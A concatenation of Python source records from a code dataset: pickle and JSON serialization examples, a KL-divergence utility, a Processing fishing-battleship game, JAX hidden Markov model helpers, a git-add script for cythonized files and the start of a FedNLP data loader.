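The record that begins here lists three serialization routes (pickle, JSON, YAML) but its walkthrough below demonstrates only pickle. For contrast, a sketch of the JSON route on the same Employee shape using the standard library; json handles plain data rather than arbitrary instances, hence the detour through __dict__:

import json

class Employee:
    def __init__(self, eno, ename, esal, eaddr):
        self.eno = eno
        self.ename = ename
        self.esal = esal
        self.eaddr = eaddr

e = Employee(100, 'Saroj', 123, 'Mumbai')

# Serialization: dump the attribute dict, which json can encode directly.
with open('emp.json', 'w') as f:
    json.dump(e.__dict__, f)

# Deserialization: rebuild the object from the decoded dict.
with open('emp.json') as f:
    emp_object = Employee(**json.load(f))

print(emp_object.ename)   # Saroj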
It is Python's inbuilt module.\n\n# pickle module contains dump() function to perform Serialization(pickling).\n# pickle.dump(object,file)\n\n# pickle module contains load() function to perform Deserialization (unpickling).\n# object = pickle.load(file)\n\nimport pickle\n\nclass Employee:\n\n def __init__(self,eno,ename,esal,eaddr):\n self.eno=eno\n self.ename=ename\n self.esal=esal\n self.eaddr=eaddr \n\n def display(self):\n print(f'Employee Number:{self.eno} , Employee Name:{self.ename} ,Employee Salary:{self.esal} , Employee Address:{self.eaddr}')\n\n\ne = Employee(100,'Saroj',123,'Mumbai')\n\n# Serialization\nwith open('emp.dat','wb') as f:\n pickle.dump(e,f)\n\nprint('Pickling of the object completed...')\n\n# Deserialization\n\nwith open('emp.dat','rb') as f:\n emp_object = pickle.load(f)\n\n\nprint('Unpickling of the object completed')\n\nemp_object.display()\n\n\n\n\n\n\n","sub_path":"SerializationandDeserialization/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"485695236","text":"#exercise4\nfile1 = open(\"week4.txt\")\nfor line in file1 :\n x = line.split()\n print(x)\n#Exercise 5\nfile2 = open(\"mbox-short.txt\")\ncount = 0\nfor line in file2:\n if line.startswith('From'):\n count = count + 1\n m = line.split()\n print(m[1])\nprint(count)\n\n","sub_path":"week4.py","file_name":"week4.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"499427533","text":"import numpy as np\n\n\ndef kl_divergence_multivariate_gaussians(mu_a, mu_b, cov_a, cov_b):\n \"\"\"\n Compute the KL divergence between two multivariate Gaussians, i.e. 
KL(P_a || P_b)\n\n Derivation: See https://stanford.edu/~jduchi/projects/general_notes.pdf\n :param mu_a: mean of distribution a\n :param mu_b: mean of distribution b\n :param cov_a: covariance of distribution a\n :param cov_b: covariance of distribution b\n :return: KL(P_a || P_b)\n \"\"\"\n num_dims = len(mu_a)\n cov_b_inv = np.linalg.inv(cov_b)\n\n return 0.5 * (\n + np.linalg.slogdet(cov_b)[1] - np.linalg.slogdet(cov_a)[1]\n - num_dims\n + np.trace(cov_b_inv @ cov_a)\n + (mu_b - mu_a).T @ (cov_b_inv @ (mu_b - mu_a))\n )\n\n\ndef polynomial_basis_function(x, degree):\n return x ** degree\n\n\ndef expand(x, bf, bf_args=None):\n if bf_args is None:\n return np.concatenate([np.ones((len(x), 1)), bf(x)], axis=1)\n else:\n return np.concatenate([np.ones(x.shape)] + [bf(x, bf_arg) for bf_arg in bf_args], axis=1)\n","sub_path":"examples/bayesian_linear_regression/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206316838","text":"import random\nx = 0\ny = 0\nx_worm = 330\nworm_width = 48\ny_worm = 41\nworm_height = 48\nscene = 1\nused_coordinates = []\nfish_coordinates = []\ncurrent_coordinates = []\np1_caught_fish = []\np2_caught_fish = []\nhit_coords_one = []\nhit_coords_two = []\nmiss_coordinates = []\np1_fish_order = []\np2_fish_order = []\np1_point_counter = 0\np2_point_counter = 0\np1_fish_counter = 0\np2_fish_counter = 0\nplayer_one_turn = True\nrandomize_counter = 5\ncaught_counter = 0\nturn_counter = 0\nbonus_points = [50, 100, 150, 200, 250]\ntotal_coordinates = 15\nfish_coordinates = []\njellyfish_coordinates = []\njellyfish_starting = []\njellyfish_health = 1\nsilverfish_coordinates = []\nsilverfish_starting = []\nsilverfish_health = 2\nfluffy_coordinates = []\nfluffy_starting = []\nfluffy_health = 3\nshark_coordinates = []\nshark_starting = []\nshark_health = 4\nmullet_coordinates = []\nmullet_starting = []\nmullet_health = 5\nrandomization_counter = 5\n\n\ndef setup():\n size(1093, 615)\n global grid, silverfish, fluffy, shark, mullet, jellyfish\n global player1_turn, player2_turn, start_fishing, p1, p2, worm\n global hole, p1_buoy, p2_buoy, instructions_1, instructions_2\n global mainscreen, silverfish, fluffy, shark, jellyfish\n global p1_win, p2_win, tie, x_axis, y_axis, missing_jellyfish\n global missing_silverfish, missing_fluffy, missing_shark, missing_mullet\n\n grid = loadImage(\"grid.png\")\n silverfish = loadImage(\"silverfish.png\")\n fluffy = loadImage(\"fluffy.png\")\n shark = loadImage(\"shark.png\")\n mullet = loadImage(\"mullet.png\")\n jellyfish = loadImage(\"jellyfish.png\")\n player1_turn = loadImage(\"player1_turn.png\")\n player2_turn = loadImage(\"player2_turn.png\")\n start_fishing = loadImage(\"start_fishing.png\")\n p1 = loadImage(\"p1.png\")\n p2 = loadImage(\"p2.png\")\n worm = loadImage(\"worm.png\")\n hole = loadImage(\"hole.png\")\n p1_buoy = loadImage(\"p1_buoy.png\")\n p2_buoy = loadImage(\"p2_buoy.png\")\n mainscreen = loadImage(\"mainscreen.png\")\n instructions_1 = loadImage(\"instructions_1.png\")\n instructions_2 = loadImage(\"instructions_2.png\")\n p1_win = loadImage(\"p1_win.png\")\n p2_win = loadImage(\"p2_win.png\")\n tie = loadImage(\"its_a_tie.png\")\n x_axis = loadImage(\"x_axis.png\")\n y_axis = loadImage(\"y_axis.png\")\n missing_jellyfish = loadImage(\"missing_jellyfish.png\")\n missing_silverfish = loadImage(\"missing_silverfish.png\")\n missing_fluffy = loadImage(\"missing_fluffy.png\")\n missing_shark 
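kl_divergence_multivariate_gaussians above implements, term for term, the closed form for two Gaussians (the derivation is in the Duchi notes linked from its docstring). Written out, with d the dimension:

\[
\mathrm{KL}\big(\mathcal{N}(\mu_a,\Sigma_a)\,\|\,\mathcal{N}(\mu_b,\Sigma_b)\big)
= \tfrac{1}{2}\left[\ln\frac{\det\Sigma_b}{\det\Sigma_a} - d
+ \operatorname{tr}\big(\Sigma_b^{-1}\Sigma_a\big)
+ (\mu_b-\mu_a)^{\top}\Sigma_b^{-1}(\mu_b-\mu_a)\right]
\]

The two slogdet calls supply the log-determinant ratio in a numerically stable way, and the remaining lines of the function are the trace and quadratic terms verbatim.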
= loadImage(\"missing_shark.png\")\n missing_mullet = loadImage(\"missing_mullet.png\")\n\n\ndef load_picture(picture, x_position, y_position, x_size, y_size):\n try:\n image(picture, x_position, y_position, x_size, y_size)\n except:\n rect(x_position, y_position, x_size, y_size)\n\n\ndef fish_randomize(health, starting_coordinates, fish_type_coordinates):\n global randomize_counter, fish_coordinates, randomization_counter\n orientation = 0\n duplicate_counter = 0\n starting_coordinates.append(random.randint(0, 9))\n starting_coordinates.append(random.randint(0, 9))\n fish_type_coordinates.append(starting_coordinates)\n horizontal_coordinates = starting_coordinates[0]\n vertical_coordinates = starting_coordinates[1]\n\n orientation = random.randint(1, 2)\n if orientation == 1:\n for i in range(health):\n if health == 2 and horizontal_coordinates > 8:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 2 and horizontal_coordinates < 9:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and horizontal_coordinates > 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and horizontal_coordinates < 8:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and horizontal_coordinates > 6:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and horizontal_coordinates < 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 5 and horizontal_coordinates > 5:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n else:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n\n else:\n for i in range(health):\n if health == 2 and vertical_coordinates > 8:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 2 and vertical_coordinates < 9:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and vertical_coordinates > 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and vertical_coordinates < 8:\n expanded_coordinates = 
[]\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and vertical_coordinates > 6:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and vertical_coordinates < 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 5 and vertical_coordinates > 5:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n else:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n fish_type_coordinates.pop(1)\n fish_coordinates.append(fish_type_coordinates)\n randomization_counter -= 1\n\n\ndef check_hit(coordinates, current_coordinates):\n global p1_point_counter, p2_point_counter\n global current_coordiantes, total_coordinates\n global p1_fish_counter, p2_fish_counter\n global p1_fish_order, p2_fish_order\n iteration_counter = 0\n match_result = False\n for i in range(len(coordinates)):\n j_removal_counter = 0\n for j in range(len(coordinates[i])):\n iteration_counter += 1\n if coordinates[i][j - j_removal_counter] == current_coordinates:\n match_result = True\n del coordinates[i][j - j_removal_counter]\n j_removal_counter += 1\n total_coordinates -= 1\n if coordinates[i] == []:\n if player_one_turn:\n p1_point_counter += 100 + bonus_points[i]\n p1_caught_fish.append(bonus_points[i])\n p1_fish_counter += 1\n p1_fish_order.append([p1_fish_counter, bonus_points[i]])\n hit_coords_one.append(current_coordinates)\n else:\n p2_point_counter += 100 + bonus_points[i]\n p2_caught_fish.append(bonus_points[i])\n p2_fish_counter += 1\n p2_fish_order.append([p2_fish_counter, bonus_points[i]])\n hit_coords_two.append(current_coordinates)\n else:\n if player_one_turn:\n p1_point_counter += 100\n hit_coords_one.append(current_coordinates)\n else:\n p2_point_counter += 100\n hit_coords_two.append(current_coordinates)\n else:\n if iteration_counter == total_coordinates and not match_result:\n miss_coordinates.append(current_coordinates)\n\n\ndef check_caught(coordinates):\n global caught_counter, total_coordinates\n for i in range(len(coordinates)):\n if coordinates[i] == []:\n if i == 0:\n coordinates[i].append('jellyfish')\n caught_counter += 1\n total_coordinates += 1\n elif i == 1:\n coordinates[i].append('silverfish')\n caught_counter += 1\n total_coordinates += 1\n elif i == 2:\n coordinates[i].append('fluffy')\n caught_counter += 1\n total_coordinates += 1\n elif i == 3:\n coordinates[i].append('shark')\n caught_counter += 1\n total_coordinates += 1\n else:\n coordinates[i].append('mullet')\n caught_counter += 1\n total_coordinates += 1\n\n\ndef check_end_game(caught_counter):\n global scene\n if caught_counter == 5:\n scene = 5\n\n\ndef switch_turn():\n global turn_counter\n global player_one_turn\n if turn_counter % 2 == 1:\n player_one_turn = True\n else:\n player_one_turn = False\n turn_counter += 1\n\n\ndef draw():\n global x_worm, y_worm, worm_width, worm_height, x\n\n if scene == 1:\n if x >= 
3300:\n x = -800\n else:\n x += 7\n load_picture(mainscreen, 0, 0, 1093, 615)\n load_picture(jellyfish, x-100, 196, 80, 80)\n load_picture(silverfish, x-1800, 472, 195, 80)\n load_picture(fluffy, x-1400, 196, 220, 80)\n load_picture(shark, x-800, 468, 440, 160)\n\n elif scene == 2:\n load_picture(instructions_1, 0, 0, 1093, 615)\n\n elif scene == 3:\n load_picture(instructions_2, 0, 0, 1093, 615)\n\n elif scene == 4:\n if x >= 3000:\n x += 0\n else:\n x += 30\n\n while randomization_counter != 0:\n fish_randomize(jellyfish_health, jellyfish_starting, jellyfish_coordinates)\n fish_randomize(silverfish_health, silverfish_starting, silverfish_coordinates)\n fish_randomize(fluffy_health, fluffy_starting, fluffy_coordinates)\n fish_randomize(shark_health, shark_starting, shark_coordinates)\n fish_randomize(mullet_health, mullet_starting, mullet_coordinates)\n print(fish_coordinates)\n\n background(122, 190, 255)\n load_picture(grid, 330, 41, 480, 480)\n load_picture(x_axis, 330, -2, 480, 48)\n load_picture(y_axis, 282, 43, 48, 480)\n load_picture(missing_jellyfish, 5, 2, 60, 60)\n load_picture(missing_jellyfish, 1029, 2, 60, 60)\n load_picture(missing_silverfish, 5, 66, 117, 60)\n load_picture(missing_silverfish, 942, 66, 117, 60)\n load_picture(missing_fluffy, 5, 130, 165, 60)\n load_picture(missing_fluffy, 924, 130, 165, 60)\n load_picture(missing_shark, 5, 194, 220, 80)\n load_picture(missing_shark, 869, 194, 260, 80)\n load_picture(missing_mullet, 5, 278, 236, 80)\n load_picture(missing_mullet, 857, 278, 232, 80)\n\n for i in range(len(hit_coords_one)):\n load_picture(p1_buoy, hit_coords_one[i][0] * 48 + 342, hit_coords_one[i][1] * 48 + 50, 48, 46)\n\n for i in range(len(hit_coords_two)):\n load_picture(p2_buoy, hit_coords_two[i][0] * 48 + 342, hit_coords_two[i][1] * 48 + 50, 48, 46)\n\n for i in range(len(miss_coordinates)):\n load_picture(hole, miss_coordinates[i][0] * 48 + 337, miss_coordinates[i][1] * 48 + 53, 44, 32)\n\n# ARROW VISUAL\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n\n textSize(48)\n fill(255)\n load_picture(start_fishing, x - 1100, 100, 1018, 368)\n load_picture(p1, 51, 360, 180, 200)\n load_picture(p2, 858, 360, 180, 200)\n text(p1_point_counter, 83, 592)\n text(p2_point_counter, 890, 592)\n\n# CAUGHT FISH P1\n fill(122, 190, 255)\n noStroke()\n for i in p1_caught_fish:\n if i == 50:\n load_picture(jellyfish, 4, 2, 60, 60)\n rect(1029, 2, 60, 60)\n elif i == 100:\n load_picture(silverfish, 4, 66, 146, 60)\n rect(942, 66, 146, 60)\n elif i == 150:\n load_picture(fluffy, 4, 130, 165, 60)\n rect(924, 130, 165, 60)\n elif i == 200:\n load_picture(shark, 4, 194, 220, 80)\n rect(869, 194, 220, 80)\n elif i == 250:\n load_picture(mullet, 4, 278, 236, 80)\n rect(857, 278, 232, 80)\n# CAUGHT FISH P2\n for i in p2_caught_fish:\n if i == 50:\n load_picture(jellyfish, 1029, 2, 60, 60)\n rect(4, 2, 60, 60)\n elif i == 100:\n load_picture(silverfish, 942, 66, 146, 60)\n rect(4, 66, 146, 60)\n elif i == 150:\n load_picture(fluffy, 924, 130, 165, 60)\n rect(4, 130, 165, 60)\n elif i == 200:\n load_picture(shark, 869, 194, 220, 80)\n rect(4, 194, 220, 80)\n elif i == 250:\n load_picture(mullet, 857, 278, 232, 80)\n rect(4, 278, 236, 80)\n\n\n# TURN BANNER\n if player_one_turn:\n load_picture(player1_turn, 362, 534, 368, 80)\n else:\n load_picture(player2_turn, 362, 534, 368, 80)\n\n elif scene == 5:\n if x >= 3300:\n x = -800\n else:\n x += 5\n\n background(122, 190, 255)\n textSize(60)\n fill(255)\n\n tint(122, 190, 255, 200)\n load_picture(shark, x - 300, 300, 183, 
60)\n load_picture(mullet, x - 400, 100, 200, 60)\n load_picture(jellyfish, x - 70, 500, 30, 30)\n load_picture(jellyfish, x - 1100, 415, 30, 30)\n load_picture(silverfish, x - 1700, 150, 81, 30)\n load_picture(fluffy, x - 1500, 400, 92, 30)\n load_picture(shark, x - 700, 250, 183, 60)\n load_picture(mullet, x - 1200, 700, 200, 60)\n load_picture(jellyfish, x - 1600, 500, 30, 30)\n load_picture(fluffy, x - 1000, 651, 92, 30)\n load_picture(jellyfish, x - 1100, 5, 30, 30)\n load_picture(silverfish, x - 1700, 600, 81, 30)\n tint(122, 190, 255, 100)\n load_picture(silverfish, x - 100, 450, 81, 30)\n load_picture(fluffy, x - 500, 700, 92, 30)\n load_picture(shark, x - 1300, 150, 183, 60)\n load_picture(mullet, x - 1400, 3, 200, 60)\n load_picture(fluffy, x - 550, 286, 92, 30)\n load_picture(shark, x - 650, 170, 183, 60)\n load_picture(mullet, x - 700, 53, 200, 60)\n load_picture(jellyfish, x - 850, 500, 60, 30)\n\n noTint()\n# SCORE DISPLAY\n text(p1_point_counter, 389, 312)\n text(p2_point_counter, 640, 312)\n\n# DISPLAYING CAUGHT FISH\n load_picture(p1, 389, 400, 140, 200)\n load_picture(p2, 640, 400, 144, 200)\n\n# CAUGHT FISH P1\n for i in p1_fish_order:\n if i[0] == 1:\n if i[1] == 50:\n load_picture(jellyfish, 4, 268, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 268, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 268, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 268, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 268, 180, 60)\n elif i[0] == 2:\n if i[1] == 50:\n load_picture(jellyfish, 4, 332, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 332, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 332, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 332, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 332, 180, 60)\n elif i[0] == 3:\n if i[1] == 50:\n load_picture(jellyfish, 4, 396, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 396, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 396, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 396, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 396, 180, 60)\n elif i[0] == 4:\n if i[1] == 50:\n load_picture(jellyfish, 4, 460, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 460, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 460, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 460, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 460, 180, 60)\n elif i[0] == 5:\n if i[1] == 50:\n load_picture(jellyfish, 4, 524, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 524, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 524, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 524, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 524, 180, 60)\n\n# CAUGHT FISH P2\n for i in p2_fish_order:\n if i[0] == 1:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 268, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 268, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 268, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 268, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 268, 180, 60)\n elif i[0] == 2:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 332, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 332, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 332, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 332, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 332, 180, 60)\n elif i[0] == 3:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 396, 52, 
52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 396, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 396, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 396, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 396, 180, 60)\n elif i[0] == 4:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 460, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 460, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 460, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 460, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 460, 180, 60)\n elif i[0] == 5:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 524, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 524, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 524, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 524, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 524, 180, 60)\n\n if p1_point_counter > p2_point_counter:\n load_picture(p1_win, 0, 0, 1093, 615)\n\n elif p1_point_counter < p2_point_counter:\n load_picture(p2_win, 0, 0, 1093, 615)\n else:\n load_picture(tie, 0, 0, 1093, 615)\n else:\n pass\n\n\n# ARROW NAVIGATION\ndef keyPressed():\n global x_worm, y_worm, worm_width, worm_height, scene\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n if (key == CODED):\n if (keyCode == LEFT):\n if x_worm == 330:\n pass\n else:\n x_worm -= 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n elif (keyCode == RIGHT):\n if x_worm == 768:\n pass\n else:\n x_worm += 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n elif (keyCode == UP):\n if y_worm == 41:\n pass\n else:\n y_worm -= 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n elif (keyCode == DOWN):\n if y_worm == 486:\n pass\n else:\n y_worm += 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n\n# BUTTON CONFIRM\n if (key == ENTER):\n if scene == 1:\n scene += 1\n\n elif scene == 2:\n scene += 1\n\n elif scene == 3:\n scene += 1\n\n elif scene == 4:\n current_coordinates = []\n xcoordinate = (x_worm - 330)/48\n ycoordinate = (y_worm - 41)/48\n current_coordinates.append(xcoordinate)\n current_coordinates.append(ycoordinate)\n\n# COORDINATE VALIDITY\n if current_coordinates in used_coordinates:\n pass\n else:\n used_coordinates.append(current_coordinates)\n check_hit(fish_coordinates, current_coordinates)\n check_caught(fish_coordinates)\n check_end_game(caught_counter)\n switch_turn()\n else:\n pass\n","sub_path":"development/sketch_119.pyde","file_name":"sketch_119.pyde","file_ext":"pyde","file_size_in_byte":24735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65647836","text":"# Common functions that can be used for any hidden markov model type.\n# Author: Aleyna Kara(@karalleyna)\n\nimport jax.numpy as jnp\nimport matplotlib.pyplot as plt\nfrom jax import vmap, jit\nfrom jax.random import split, randint, PRNGKey, permutation\nfrom functools import partial\n# !pip install graphviz\nfrom graphviz import Digraph\n\n\n@partial(jit, static_argnums=(2,))\ndef hmm_sample_minibatches(observations, valid_lens, batch_size, rng_key):\n '''\n Creates minibatches consists of the random permutations of the\n given observation sequences\n\n Parameters\n ----------\n observations : array(N, seq_len)\n All observation sequences\n\n valid_lens : array(N, seq_len)\n Consists of the valid length of each observation sequence\n\n batch_size : int\n The number of observation sequences that will be 
included in\n each minibatch\n\n rng_key : array\n Random key of shape (2,) and dtype uint32\n\n Returns\n -------\n * array(num_batches, batch_size, max_len)\n Minibatches\n '''\n num_train = len(observations)\n perm = permutation(rng_key, num_train)\n\n def create_mini_batch(batch_idx):\n return observations[batch_idx], valid_lens[batch_idx]\n\n num_batches = num_train // batch_size\n batch_indices = perm.reshape((num_batches, -1))\n minibatches = vmap(create_mini_batch)(batch_indices)\n return minibatches\n\n\n@partial(jit, static_argnums=(1, 2, 3))\ndef hmm_sample_n(params, sample_fn, n, max_len, rng_key):\n '''\n Generates n observation sequences from the given Hidden Markov Model\n\n Parameters\n ----------\n params : HMMNumpy or HMMJax\n Hidden Markov Model\n\n sample_fn :\n The sample function of the given hidden markov model\n\n n : int\n The total number of observation sequences\n\n max_len : int\n The upper bound of the length of each observation sequence. Note that the valid length of the observation\n sequence is less than or equal to the upper bound.\n\n rng_key : array\n Random key of shape (2,) and dtype uint32\n\n Returns\n -------\n * array(n, max_len)\n Observation sequences\n '''\n\n def sample_(params, n_samples, key):\n return sample_fn(params, n_samples, key)[1]\n\n rng_key, rng_lens = split(rng_key)\n lens = randint(rng_lens, (n,), minval=1, maxval=max_len + 1)\n keys = split(rng_key, n)\n observations = vmap(sample_, in_axes=(None, None, 0))(params, max_len, keys)\n return observations, lens\n\n\n@jit\ndef pad_sequences(observations, valid_lens, pad_val=0):\n '''\n Generates n observation sequences from the given Hidden Markov Model\n\n Parameters\n ----------\n\n observations : array(N, seq_len)\n All observation sequences\n\n valid_lens : array(N, seq_len)\n Consists of the valid length of each observation sequence\n\n pad_val : int\n Value that the invalid observable events of the observation sequence will be replaced\n\n Returns\n -------\n * array(n, max_len)\n Ragged dataset\n '''\n\n def pad(seq, len):\n idx = jnp.arange(1, seq.shape[0] + 1)\n return jnp.where(idx <= len, seq, pad_val)\n\n ragged_dataset = vmap(pad, in_axes=(0, 0))(observations, valid_lens), valid_lens\n return ragged_dataset\n\n\ndef hmm_plot_graphviz(trans_mat, obs_mat, states=[], observations=[]):\n \"\"\"\n Visualizes HMM transition matrix and observation matrix using graphhiz.\n\n Parameters\n ----------\n trans_mat, obs_mat, init_dist: arrays\n\n states: List(num_hidden)\n Names of hidden states\n\n observations: List(num_obs)\n Names of observable events\n\n Returns\n -------\n dot object, that can be displayed in colab\n \"\"\"\n\n n_states, n_obs = obs_mat.shape\n\n dot = Digraph(comment='HMM')\n if not states:\n states = [f'State {i + 1}' for i in range(n_states)]\n if not observations:\n observations = [f'Obs {i + 1}' for i in range(n_obs)]\n\n # Creates hidden state nodes\n for i, name in enumerate(states):\n table = [f'{observations[j]}{\"%.2f\" % prob}' for j, prob in\n enumerate(obs_mat[i])]\n label = f'''<{''.join(table)}
<TR><TD>{name}</TD></TR>
>'''\n dot.node(f's{i}', label=label)\n\n # Writes transition probabilities\n for i in range(n_states):\n for j in range(n_states):\n dot.edge(f's{i}', f's{j}', label=str('%.2f' % trans_mat[i, j]))\n dot.attr(rankdir='LR')\n # dot.render(file_name, view=True)\n return dot\n","sub_path":"jsl/hmm/hmm_utils.py","file_name":"hmm_utils.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180152806","text":"import os\nfrom glob import glob\n\n# get *.pyx files\npyxfiles = []\npxd_include_dirs = [\n directory for directory, dirs, files in os.walk('pytraj')\n if '__init__.pyx' in files or '__init__.pxd' in files\n or '__init__.py' in files\n]\n\npxd_include_patterns = [\n p + '/*.pxd' for p in pxd_include_dirs]\n\nfor p in pxd_include_dirs:\n pyxfiles.extend([ext.split(\".\")[0] for ext in glob(p + '/*.pyx') if '.pyx' in ext])\n\nprint(\"move old cythonized files to ./trash folder\")\nfor ext_name in pyxfiles:\n pyxfile = ext_name + \".cpp\"\n do_this = \"git add %s\" % pyxfile\n os.system(do_this)\n","sub_path":"scripts/add_cythonized_files.py","file_name":"add_cythonized_files.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"215212664","text":"import os\n\nimport numpy as np\nimport torch\nfrom transformers import (\n BertConfig,\n BertTokenizer,\n DistilBertConfig,\n DistilBertTokenizer,\n)\nfrom fedml.model.nlp.model_args import *\nfrom fedml.data.fednlp.base.data_manager.base_data_manager import BaseDataManager\nfrom .text_classification_data_manager import (\n TextClassificationDataManager,\n)\n\nfrom .text_classification_preprocessor import (\n TLMPreprocessor as TCPreprocessor,\n)\n\n# from fedml.data.FederatedEMNIST.data_loader import load_partition_data_federated_emnist\n# from fedml.data.ImageNet.data_loader import load_partition_data_ImageNet\n# from fedml.data.Landmarks.data_loader import load_partition_data_landmarks\n# from fedml.data.MNIST.data_loader import load_partition_data_mnist\n# from fedml.data.cifar10.data_loader import load_partition_data_cifar10\n# from fedml.data.cifar100.data_loader import load_partition_data_cifar100\n# from fedml.data.cinic10.data_loader import load_partition_data_cinic10\n# from fedml.data.fed_cifar100.data_loader import load_partition_data_federated_cifar100\n# from fedml.data.fed_shakespeare.data_loader import (\n# load_partition_data_federated_shakespeare,\n# )\n# from fedml.data.shakespeare.data_loader import load_partition_data_shakespeare\n# from 